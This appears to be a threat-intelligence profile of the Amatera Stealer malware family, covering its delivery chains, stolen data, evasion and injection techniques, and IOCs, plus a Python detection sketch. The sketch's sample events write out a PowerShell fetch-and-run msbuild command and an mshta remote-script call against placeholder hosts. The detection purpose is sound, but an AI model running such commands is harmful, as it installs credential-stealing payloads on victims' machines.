Amatera Stealer
Amatera Stealer is a C++ information-stealing malware family and malware-as-a-service offering that emerged as a rebranded and significantly updated successor to ACR Stealer (also referred to as AcridRain), with reporting also linking its lineage to GrMsk Stealer. It has been marketed on underground forums and via Telegram, and reporting associates earlier ACR/Amatera activity with the threat actor SheldIO. Multiple sources describe it as a commodity infostealer and, in some reporting, as a likely successor or alternative to Lumma following disruption of Lumma operations.
Observed delivery vectors include ClearFake web inject campaigns, ClickFix and InstallFix social-engineering chains, fake CAPTCHA prompts, malicious Google Ads, cloned Claude Code installation pages, fake software downloads and cracked software lures, MSHTA-based loader chains, CountLoader, GoFlateLoader, and abuse of the signed Microsoft App-V script SyncAppvPublishingServer.vbs. On Windows, several campaigns used mshta.exe and multi-stage PowerShell or HTA/.NET loader chains to execute Amatera in memory; one campaign used a signed App-V script as a proxy for PowerShell execution. Amatera has also been delivered through compromised websites using EtherHiding and fake localized CAPTCHA overlays, and through malicious traffic distribution systems serving password-protected archives. GoFlateLoader has been observed delivering Amatera alongside other stealers, while Bitdefender linked Amatera delivery to MSHTA-heavy chains involving CountLoader.
The malware steals browser-stored credentials, cookies, session tokens, browser data, crypto-wallet information, browser wallet extensions, desktop wallet data, password manager data, email and messaging application data, SSH and FTP tool data, and system information. Reported targets include Signal, WhatsApp, XMPP clients, Discord, and files from user directories including the Downloads folder. Some reporting states it can bypass Chrome App-Bound Encryption by injecting shellcode into Chromium-based browsers to copy sensitive files for exfiltration. eSentire reported expanded harvesting to 65 browser targets, 165 wallet browser extensions, and 137 desktop wallet targets, plus file-grabber logic for wallet exports, seed phrases, private keys, passwords, JSON, TXT, PDF, and KDBX files.
Amatera is actively developed and includes multiple stealth and evasion features. Reported capabilities include dynamic API resolution, WoW64 syscall-based execution, direct interaction with \Device\Afd\Endpoint via NTSockets instead of Winsock, RecycledGate/FreshyCalls/Hell's Gate-style syscall resolution, anti-debugging checks, anti-analysis checks, geofencing for Ukrainian keyboard layouts, and checks for Kaspersky-related drivers. It has been observed retrieving configuration from C2 rather than embedding it statically, using encoded JSON, and supporting download-and-execute of additional payloads including .exe, .cmd, .dll, and .ps1 files. eSentire reported a reflective shellcode loader that decrypts payloads with a 128-byte XOR key, decompresses them with aPLib, and can erase PE headers in memory. Reporting also notes upgrades in C2 protection from AES-256-CBC to ECDH over NIST P-256 with ChaCha20-Poly1305 in some variants, while other reporting observed HTTP C2 with Base64- and XOR-encoded data and newer support for HTTPS.
Associated infrastructure and indicators directly mentioned in the reporting include domains amaprox[.]icu, b1[.]talismanoverblown[.]com, compactedtightness[.]cfd, contatoplus[.]com, claude[.]update-version[.]com, and oakenfjrod[.]ru; IPs 104.21.80[.]1, 172.67.178[.]5, 77.91.97[.]244, and 144.124.235[.]102; and the ClearFake BNB Smart Chain Testnet contract 0x80d31D935f0EC978253A26D48B5593599B9542C7. Reported sample hashes include e913fa5b2dd0a7fc3dbaf0a6f882b3ead9a58511bd945b6e5c478cbd2b900508 and ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772. Proofpoint also published Emerging Threats signatures 2052674, 2062510, and 2062511 for Amatera/ACR Stealer C2 check-in and exfiltration detection.
Victimology in the provided reporting includes broad commodity targeting, with specific observations affecting developers searching for AI tooling such as Claude Code, users exposed to fake software/crack ecosystems, and at least one intercepted intrusion in a finance-sector environment. Bitdefender's reporting suggests some App-V-based ClickFix delivery may preferentially affect enterprise-managed Windows environments because App-V is typically present on Enterprise, Education, and Server editions.
Groups observed using it
1 distinct threat actor attributed by public researchers.
In late April 2026, eSentire's Threat Response Unit (TRU) intercepted an attempted delivery of Amatera Stealer within a customer environment in the Finance industry. Amatera Stealer is a rebranded version of ACR (AcridRain) Stealer, a C++ based information stealer previously marketed as Malware-as-a-Service (MaaS) on underground forums by the threat actor SheldIO.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Execution
6 techniques
This command uses PowerShell to download a malicious C# project file (.csproj) from a remote server using Invoke-RestMethod (irm), saves it to the temporary directory, and then executes it using msbuild.exe.
The next step instructed the user to press Ctrl+V, which pastes the command into the Windows Run dialog, followed by the final step of pressing Enter to run the command.
Another interesting feature that was not previously documented relative to this malware is its use of WoW64 Syscalls... this sample defines various functions that stage a Windows API to be resolved and executed dynamically.
The code used to initialize contact with the C2 at this stage leverages NTSockets by interfacing with the device "\Device\Afd\Endpoint" directly, rather than using the Winsock library.
Privilege Escalation
3 techniques
Finally, the script performs a shellcode injection routine using a combination of Early Bird and Context Hijack techniques. It begins with the Early Bird injection by launching a legitimate Windows process — OpenWith.exe — in a suspended state... allocates executable memory inside the suspended process, and writes the shellcode into that space.
Next, it uses context hijacking by retrieving and modifying the CPU context of the suspended thread — specifically changing the instruction pointer (EIP) so that when the process is resumed, it begins executing the injected shellcode instead of its original code.
Stealth
11 techniques
The .csproj file contained obfuscated logic that reconstructs and runs another layer of Base64-encoded PowerShell... This third PowerShell script is again heavily obfuscated and uses XOR encoding.
Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts... it uses a renamed MSHTA copy disguised as iso2022.exe
The vast majority of detections for mshta.exe come from instances where the command line contains domains that appear to be legitimate services but are hosted on the .cc TLD... Starting in late February 2026... shifted to .vg and .gl TLDs.
It begins with the Early Bird injection by launching a legitimate Windows process — OpenWith.exe — in a suspended state, meaning the process is created but not yet allowed to run.
The script first disables PowerShell logging and suppresses output by setting all preference variables (such as ErrorActionPreference, VerbosePreference, etc.) to SilentlyContinue and overriding built-in functions like Write-Host.
The command uses PowerShell to download a malicious C# project file (.csproj) from a remote server using Invoke-RestMethod (irm), saves it to the temporary directory, and then executes it using msbuild.exe — a legitimate .NET build tool included in Windows.
It uses a 128-byte XOR key to first decrypt the encrypted payload blob, then aPLib to decompress it.
The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.
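The Execution and Stealth evidence above describes three observable patterns: mshta.exe pulling an HTA from a .cc/.vg/.gl domain, a PowerShell one-liner pasted into the Run dialog that fetches a .csproj with irm and hands it to msbuild.exe, and a loader script that sets every *Preference variable to SilentlyContinue and redefines Write-Host. The following is an added detection sketch written for this page, not code from any of the cited vendors; the event fields (parent_image, image, command_line) and the sample telemetry are constructed assumptions modelled on Sysmon-style process-creation records.

```python
import re
from urllib.parse import urlparse

# Heuristics taken from the reporting quoted on this page: mshta.exe fetching from
# .cc/.vg/.gl domains, an "irm ... msbuild" ClickFix chain started from the Run
# dialog (explorer.exe parent), and a script silencing every *Preference variable.
SUSPECT_TLDS = {"cc", "vg", "gl"}
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
PREF_RE = re.compile(r"""\$\w+Preference\s*=\s*['"]?SilentlyContinue""", re.IGNORECASE)
IRM_RE = re.compile(r"\b(irm|Invoke-RestMethod)\b", re.IGNORECASE)

def url_tlds(cmdline):
    """Return the set of top-level domains of all URLs found in a command line."""
    hosts = (urlparse(u).hostname or "" for u in URL_RE.findall(cmdline))
    return {h.rsplit(".", 1)[1].lower() for h in hosts if "." in h}

def score_process_event(evt):
    """Return the list of reasons a process-creation event resembles this chain."""
    image, parent = evt["image"].lower(), evt["parent_image"].lower()
    cmd = evt["command_line"]
    reasons = []
    if image.endswith("mshta.exe") and url_tlds(cmd) & SUSPECT_TLDS:
        reasons.append("mshta.exe loading a remote HTA from a .cc/.vg/.gl domain")
    if image.endswith("powershell.exe"):
        if IRM_RE.search(cmd) and "msbuild" in cmd.lower():
            reasons.append("PowerShell fetches a .csproj with irm and runs it via msbuild.exe")
        if parent.endswith("explorer.exe") and URL_RE.search(cmd):
            reasons.append("PowerShell with a URL launched from the Run dialog (explorer.exe parent)")
    return reasons

def silences_powershell_output(script):
    """True when a script sets 3+ *Preference variables to SilentlyContinue and redefines Write-Host."""
    return len(PREF_RE.findall(script)) >= 3 and bool(
        re.search(r"function\s+Write-Host\b", script, re.IGNORECASE))

# Constructed sample telemetry (hypothetical hosts), not taken from any real incident.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -w h "irm https://lure.example.cc/p.csproj -o $env:TEMP\p.csproj; msbuild $env:TEMP\p.csproj"'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://cdn.example.vg/verify"},
]
SAMPLE_SCRIPT = ("$ErrorActionPreference='SilentlyContinue';$VerbosePreference='SilentlyContinue';"
                 "$WarningPreference='SilentlyContinue';function Write-Host {}")

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        print(evt["image"].rsplit("\\", 1)[-1], "->", score_process_event(evt) or "clean")
    print("script silences output:", silences_powershell_output(SAMPLE_SCRIPT))
```

The TLD list and the three-variable threshold are tuning knobs; a real deployment would feed these functions from script-block logging (Event ID 4104) and process-creation telemetry rather than the inline samples.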
Credential Access
4 techniques
Stealing browser data relating to Cookies, Web Forms, Profile Data (web history)
Amatera Stealer currently focuses on stealing information from installed software like browsers, crypto wallets and other software... Stealing browser data relating to Cookies, Web Forms, Profile Data.
Discovery
2 techniques
Command and Control
3 techniques
The malware initiates contact with its configured command and control (C2) server via HTTP shortly after execution... Samples of Amatera Stealer observed in May 2025 contain code which suggests new support for HTTPS requests.
Exfiltration
1 technique
IOCs tracked for this family
78 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
46 sources tracked across advisories, community write-ups, and news.
An information stealer observed as a payload delivered by GoFlateLoader.
An information stealer delivered by GoFlateLoader to harvest saved passwords, browser data, and cryptocurrency wallet credentials from infected machines.
An information stealer observed as a final payload delivered by GoFlateLoader.
A stealer delivered in the same CountLoader/MSHTA infection chain as LummaStealer, targeting browser and wallet-related data.